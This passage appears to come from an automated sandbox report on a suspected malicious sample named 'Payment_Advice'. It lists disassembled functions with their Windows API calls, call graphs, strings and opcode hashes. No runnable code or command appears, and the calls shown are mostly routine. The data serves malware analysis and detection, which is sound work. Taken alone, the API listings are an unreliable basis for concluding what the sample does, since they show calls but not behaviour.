                                                      • memset.MSVCRT ref: 0040D875
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateFreememset
                                                      • String ID:
                                                      • API String ID: 2774703448-0
                                                      • Opcode ID: eda7e802ff362bb19e632be6cfc426e8d69579a7f719dd62f808040715c8de4f
                                                      • Instruction ID: 8aac43452d1df7e7ddc7facaec918d90005b782c0e071f0a612a12749f5edab4
                                                      • Opcode Fuzzy Hash: eda7e802ff362bb19e632be6cfc426e8d69579a7f719dd62f808040715c8de4f
                                                      • Instruction Fuzzy Hash: D71151729047159BC310EF59DC80A4BBBE8FF98710F05852EF998A7351D734EC048BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A610 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 927 40a610-40a618 928 40a629-40a63a call 40d099 927->928 929 40a61a-40a626 call 40d635 927->929 934 40a63c-40a640 928->934 935 40a66d-40a66f 928->935 936 40a642-40a653 call 40a680 HeapFree 934->936 937 40a659-40a668 FindCloseChangeNotification call 40d04a 934->937 936->937 937->935
                                                      APIs
                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403573,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A653
                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403573,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A65B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindFreeHeapNotification
                                                      • String ID:
                                                      • API String ID: 1642550653-0
                                                      • Opcode ID: f5a6c778e841c6d07bfb9fe52f6eec5ee0cdac25f63fed6a51d379ff9b816c7d
                                                      • Instruction ID: 65d915e6f26a615e9ac746504162976542945709e128f4b3ee049ec15683c9c4
                                                      • Opcode Fuzzy Hash: f5a6c778e841c6d07bfb9fe52f6eec5ee0cdac25f63fed6a51d379ff9b816c7d
                                                      • Instruction Fuzzy Hash: ECF05E72501A11EAC7212B69FC04E8BBF75AF90728F168A3AF154250F8C7369861DA5D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401CF6 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                      • RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00401D37
                                                      • RemoveDirectoryW.KERNEL32(00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020,00000001,00000000,00000000,00000064), ref: 00401D42
                                                        • Part of subcall function 004053C1: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00401D12,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002,00000000,00000000,00416020), ref: 004053D1
                                                        • Part of subcall function 00405430: TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401D21,00000000,-0000012C,00402464,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405440
                                                        • Part of subcall function 00405430: RtlEnterCriticalSection.NTDLL(00417680), ref: 0040544C
                                                        • Part of subcall function 00405430: RtlLeaveCriticalSection.NTDLL(00417680), ref: 00405480
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                                                      • String ID:
                                                      • API String ID: 1205394408-0
                                                      • Opcode ID: 7a6970a5fb77041d4d3168e70d3ade7ebc212a0fa7f0e6ccd02eabe01376b698
                                                      • Instruction ID: 20476b7fd3d52acee56ca048645dcf6dc253443faaa17c48622ea349d9d71071
                                                      • Opcode Fuzzy Hash: 7a6970a5fb77041d4d3168e70d3ade7ebc212a0fa7f0e6ccd02eabe01376b698
                                                      • Instruction Fuzzy Hash: D6E0BF71458600EAEA157B62DC82D5F7E7AFB18308741983BF450711F3CA3E9C21AA1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DA70 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DA7C
                                                      • TlsAlloc.KERNEL32 ref: 0040DA87
                                                        • Part of subcall function 0040E2A0: RtlAllocateHeap.NTDLL(03410000,00000000,0000000C), ref: 0040E2AE
                                                        • Part of subcall function 0040E2A0: RtlAllocateHeap.NTDLL(03410000,00000000,00000010), ref: 0040E2C2
                                                        • Part of subcall function 0040E2A0: TlsSetValue.KERNEL32(0000000E,00000010,?,?,0040DA97), ref: 0040E2EB
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Allocate$AllocCreateValue
                                                      • String ID:
                                                      • API String ID: 3361498153-0
                                                      • Opcode ID: 7c5f9b79d9067cb19e5e9a1cf002baf2bccb3daaf441299b5804332e4ca4ad76
                                                      • Instruction ID: 47f8b4ae80b8b65a038ebe855d6d80ffa77b4cff93089610e291c5bc18f8e931
                                                      • Opcode Fuzzy Hash: 7c5f9b79d9067cb19e5e9a1cf002baf2bccb3daaf441299b5804332e4ca4ad76
                                                      • Instruction Fuzzy Hash: 5CD012745843047BD6012BB2BC0AB843A68B704B55F518835F609962D1E7B4A040C51C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A396 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFileAttributesW.KERNEL32(00000002,00000080,0040A3CF,?,00000000,004036AE,?,00000000,-0000012C,?,00401D26,00000000,-0000012C,00402464,00000000,00000001), ref: 0040A3AD
                                                      • DeleteFileW.KERNELBASE(00000000,0040A3CF,?,00000000,004036AE,?,00000000,-0000012C,?,00401D26,00000000,-0000012C,00402464,00000000,00000001,00000000), ref: 0040A3B7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesDelete
                                                      • String ID:
                                                      • API String ID: 2910425767-0
                                                      • Opcode ID: 67e6dd9c38358ecc76eafa571f25df48be6776d23c5a607de9f76dedf8e6a781
                                                      • Instruction ID: bcd68c7d22bf6d3f36b1afe50485083cae1cfc3cb4a765cc3c7ec01f17b42dec
                                                      • Opcode Fuzzy Hash: 67e6dd9c38358ecc76eafa571f25df48be6776d23c5a607de9f76dedf8e6a781
                                                      • Instruction Fuzzy Hash: FFD09230018340BAD3565B24ED0DB5ABEA3AB80705F05C939B9C9600F5D779C8A8EB0A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DAA0 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • HeapDestroy.KERNELBASE(03410000), ref: 0040DAA9
                                                      • TlsFree.KERNELBASE(0000000E), ref: 0040DAB6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: DestroyFreeHeap
                                                      • String ID:
                                                      • API String ID: 3293292866-0
                                                      • Opcode ID: cc241ee26c244a955ba26ad4d1f9c25b69c0a2df9c06b5d01daa53644d964705
                                                      • Instruction ID: 6c0bbdb6fa8a3cec8af98e69a1a7bc2ab5198441e8c350e30bac6ed0258a684f
                                                      • Opcode Fuzzy Hash: cc241ee26c244a955ba26ad4d1f9c25b69c0a2df9c06b5d01daa53644d964705
                                                      • Instruction Fuzzy Hash: 64C04C75514304BFC6059BE4FC4C8D6377DE7486217428524F60A83261CB75F840CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A680 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A648,00000000,00000000,?,?,00403573,00000000,00000000,00000800), ref: 0040A6A7
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FileWrite
                                                      • String ID:
                                                      • API String ID: 3934441357-0
                                                      • Opcode ID: 812c28a0d7019738ae1f35b3c6f3aca29df1f38680868a56c6d4d116d25541c7
                                                      • Instruction ID: 314d761c27508dc191a0533bce5f5104cc0eddfe4e0508807eefa5cec89b5f55
                                                      • Opcode Fuzzy Hash: 812c28a0d7019738ae1f35b3c6f3aca29df1f38680868a56c6d4d116d25541c7
                                                      • Instruction Fuzzy Hash: B9F0F276104700AFD320CF58D808B87B7E8EB48721F00C82EE59AC2650C730E850DB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402ED5 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402EF1
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      • Opcode ID: 08c5476610742d3c05b9e882893e6cd53964fab8079b2f0af00292dd38d2d350
                                                      • Instruction ID: f5a000ac0987a650bc88b837f8e1ad7b931e53341246efd34f3b0dd6567822eb
                                                      • Opcode Fuzzy Hash: 08c5476610742d3c05b9e882893e6cd53964fab8079b2f0af00292dd38d2d350
                                                      • Instruction Fuzzy Hash: 82D05B7044814946D710B765D549B9B72ECD700308F61883AE085965C1F7FCE9D9D69B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409500 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetEnvironmentVariableW.KERNELBASE(?,?,00403FE8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00409519
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID:
                                                      • API String ID: 1431749950-0
                                                      • Opcode ID: 604e552c4db0811e5c6c40224e5819894b0040e2f83595904d0f3e1494608cdb
                                                      • Instruction ID: 34cfba1796fdef111eafdef90552a1cc5bd8fe564668c8a79781645b6a94ecdb
                                                      • Opcode Fuzzy Hash: 604e552c4db0811e5c6c40224e5819894b0040e2f83595904d0f3e1494608cdb
                                                      • Instruction Fuzzy Hash: 14C01231204201BBDB129A0ADE08B6BBBE5EB90748F01C43AB584D22B0C338CC90DB19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040CF04 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 0040CF21
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Free
                                                      • String ID:
                                                      • API String ID: 3978063606-0
                                                      • Opcode ID: 9153b61830bc5c081ca362633ad4d17c8b4dba155c9bf8f8010ffa6db1f29739
                                                      • Instruction ID: cac381de26ac1ecbfe847cb5ae7795da5337e2a804d444a4ad9a96b74f4f3404
                                                      • Opcode Fuzzy Hash: 9153b61830bc5c081ca362633ad4d17c8b4dba155c9bf8f8010ffa6db1f29739
                                                      • Instruction Fuzzy Hash: 33C04830518102EEEF26DB15EE4C3E13A73F388346F8982769005A05F0D7788888EE4D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409780 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409789
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CreateHeap
                                                      • String ID:
                                                      • API String ID: 10892065-0
                                                      • Opcode ID: f3c23c9f1a02c0f35bf23a5f455ff8e12fd2e77267bb951d7bda2937db455f53
                                                      • Instruction ID: e40eb100870ecceaf34f32dd35deae3931ea825063bd47bde8918add0e90f93b
                                                      • Opcode Fuzzy Hash: f3c23c9f1a02c0f35bf23a5f455ff8e12fd2e77267bb951d7bda2937db455f53
                                                      • Instruction Fuzzy Hash: B1B012702843016AE6100F105C06F8035207704F97F104020F205581D4C7E01000C50C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409770 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 00409776
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: DestroyHeap
                                                      • String ID:
                                                      • API String ID: 2435110975-0
                                                      • Opcode ID: 9912d0844dff50f247fcf39c854289e29bb08a897189269cadb9df9e7f64dcc5
                                                      • Instruction ID: d198b2742550b498a5902efb394778fe90b783f14d2b41317c8e928b278f78a2
                                                      • Opcode Fuzzy Hash: 9912d0844dff50f247fcf39c854289e29bb08a897189269cadb9df9e7f64dcc5
                                                      • Instruction Fuzzy Hash: 86900230414402EFDE015F14ED189843B31F7403217028070900681030C6214450DA5C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00408AF4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 00408B2D
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00408B3C
                                                      • GetWindowTextLengthW.USER32 ref: 00408B4A
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00408B5F
                                                      • GetWindowTextW.USER32(00000000,00000001), ref: 00408B6F
                                                      • DestroyWindow.USER32(?), ref: 00408B7D
                                                      • UnregisterClassW.USER32 ref: 00408B93
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyText$AllocateClassHeapLengthLongUnregister
                                                      • String ID:
                                                      • API String ID: 3947741702-0
                                                      • Opcode ID: 7eb53a768ae0692c0e473ad2af5927535a428c9096d0e824c458b7024d51298d
                                                      • Instruction ID: 1db97ccb8ac999b3c200ada4aea9c9f5e5bcba64e28080c0d457fbdc64e0e11f
                                                      • Opcode Fuzzy Hash: 7eb53a768ae0692c0e473ad2af5927535a428c9096d0e824c458b7024d51298d
                                                      • Instruction Fuzzy Hash: 64110371104206EFCB115F64FD0C9AA3FBAFB18355B11803AF845A22B4DB3AE915DB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402762 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,00403F71,00000000), ref: 00402773
                                                      • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402783
                                                        • Part of subcall function 004097E0: RtlAllocateHeap.NTDLL(00000008,00000000,00403214), ref: 004097F1
                                                        • Part of subcall function 004098C0: memcpy.MSVCRT ref: 004098D0
                                                      • FreeResource.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,004031F8,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004027B2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                      • String ID:
                                                      • API String ID: 4216414443-0
                                                      • Opcode ID: 510ed28e8a1359c841441ee93fd11f68d847da0fe598e510e32a073710fc5d0d
                                                      • Instruction ID: fcd7274207207d3af0726e59b65efc6fb1d53367a80527e38dfdb3b78726baaa
                                                      • Opcode Fuzzy Hash: 510ed28e8a1359c841441ee93fd11f68d847da0fe598e510e32a073710fc5d0d
                                                      • Instruction Fuzzy Hash: 3FF07472418202EFDB02AF61DD0192FBAA2FF54704F11883EF494561B1D7768825EF5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405594 Relevance: 3.1, APIs: 2, Instructions: 128COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 004055B4
                                                        • Part of subcall function 0040554D: memset.MSVCRT ref: 0040555C
                                                        • Part of subcall function 0040554D: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040556B
                                                        • Part of subcall function 0040554D: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040557B
                                                      • GetVersionExW.KERNEL32(?), ref: 00405613
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Version$AddressHandleModuleProcmemset
                                                      • String ID:
                                                      • API String ID: 3445250173-0
                                                      • Opcode ID: 686fcf1f1187dd98e7380dabcd6bd3296367d629354b7633eb3422f552863a35
                                                      • Instruction ID: aad47ed63da79f17f7f6b7383021e7aa7f485cc90ed3282bc036ae210b84c5a1
                                                      • Opcode Fuzzy Hash: 686fcf1f1187dd98e7380dabcd6bd3296367d629354b7633eb3422f552863a35
                                                      • Instruction Fuzzy Hash: 3931BEB2A06E6483E23089248C44BAB6698D751760FDA0F37DD9DB72D0D23F8D458D8E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409570 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00409530,0040116F,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008), ref: 004096AC
                                                      • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004096C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 0ba5d56fe5a4be2d67618d1ff13c8c9e558ed1dd890d1823d391dd2db3b1e058
                                                      • Instruction ID: 595d54128b13282ce533104dcf03d9c77705d08e65dac7c0aa88f55107dea111
                                                      • Opcode Fuzzy Hash: 0ba5d56fe5a4be2d67618d1ff13c8c9e558ed1dd890d1823d391dd2db3b1e058
                                                      • Instruction Fuzzy Hash: 23E0CAB0109300EBC310CF20ED0878A7BF5BB88745F01C87AE809922A4E339C880EB1E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409590 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(004011C9,004011AA,00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068), ref: 00409596
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: f5f836c7c882a8e7230c9b56100d4a77dceb875441ac34891abae756498fd265
                                                      • Instruction ID: 7a0b4d9ef07032ccfcc3a2ab39acde42ed2479ecfe64f6941f5db4b971619358
                                                      • Opcode Fuzzy Hash: f5f836c7c882a8e7230c9b56100d4a77dceb875441ac34891abae756498fd265
                                                      • Instruction Fuzzy Hash: 90B001780183109BDB019F10FC087C43E72B788795F82C1B4980941274D7798454DA08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408BA9 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00408A98: wcslen.MSVCRT ref: 00408AA4
                                                        • Part of subcall function 00408A98: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00408ABA
                                                        • Part of subcall function 00408A98: wcscpy.MSVCRT ref: 00408ACB
                                                      • GetStockObject.GDI32(00000011), ref: 00408BF2
                                                      • LoadIconW.USER32 ref: 00408C29
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00408C39
                                                      • RegisterClassExW.USER32 ref: 00408C61
                                                      • IsWindowEnabled.USER32(00000000), ref: 00408C88
                                                      • EnableWindow.USER32(00000000), ref: 00408C99
                                                      • GetSystemMetrics.USER32(00000001), ref: 00408CD1
                                                      • GetSystemMetrics.USER32(00000000), ref: 00408CDE
                                                      • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 00408CFF
                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00408D13
                                                      • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00408D41
                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00408D59
                                                      • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00408D97
                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00408DA9
                                                      • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408DB1
                                                      • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00408DC6
                                                      • wcslen.MSVCRT ref: 00408DC9
                                                      • wcslen.MSVCRT ref: 00408DD1
                                                      • SendMessageW.USER32(000000B1,00000000,00000000), ref: 00408DE3
                                                      • CreateWindowExW.USER32(00000000,BUTTON,00412080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 00408E0D
                                                      • SendMessageW.USER32(00000000,00000030,00000001), ref: 00408E1F
                                                      • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408E56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00408E5F
                                                      • BringWindowToTop.USER32(00000000), ref: 00408E66
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00408E79
                                                      • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 00408E8A
                                                      • TranslateMessage.USER32(?), ref: 00408E99
                                                      • DispatchMessageW.USER32(?), ref: 00408EA4
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00408EB8
                                                      • wcslen.MSVCRT ref: 00408EC9
                                                      • wcscpy.MSVCRT ref: 00408EE1
                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408EF4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocateBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                      • String ID: 0$BUTTON$D A$EDIT$STATIC
                                                      • API String ID: 2919324462-3594934238
                                                      • Opcode ID: 123ca83ab0c83fd88dba949dc691977583e8e5ff77d2d6e508d843ab284833a1
                                                      • Instruction ID: f698e8e1fcfc6ad4c48242fdd787ef2ab910b86b8eb80e2831087f92eed6a5d3
                                                      • Opcode Fuzzy Hash: 123ca83ab0c83fd88dba949dc691977583e8e5ff77d2d6e508d843ab284833a1
                                                      • Instruction Fuzzy Hash: DC918E71648300BFE7219B60ED49F9B7EA9FB48704F01453EF644A61E1CBB99940CB5E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408F95 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 116libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00408FB3
                                                        • Part of subcall function 0040DFF0: TlsGetValue.KERNEL32(0000000E,?,?,004094F9,00000000), ref: 0040DFFA
                                                      • memset.MSVCRT ref: 00408FC1
                                                      • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 00408FCE
                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00408FF0
                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 00408FFC
                                                      • wcsncpy.MSVCRT ref: 0040901D
                                                      • wcslen.MSVCRT ref: 00409031
                                                      • wcslen.MSVCRT ref: 004090C1
                                                      • FreeLibrary.KERNEL32(00000000,00000000), ref: 004090E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryProcwcslen$FreeInitializeLoadValuememsetwcsncpy
                                                      • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                      • API String ID: 1239124402-4219398408
                                                      • Opcode ID: 3c6efe23a093742c34db4b48b740bbbc0e43620cdf862bd3b4c0e14241e1dd01
                                                      • Instruction ID: c5a4ffbffc66ec8426f93ea89e9f6f8201288988f6e88a24a2cbc14571f4a0e7
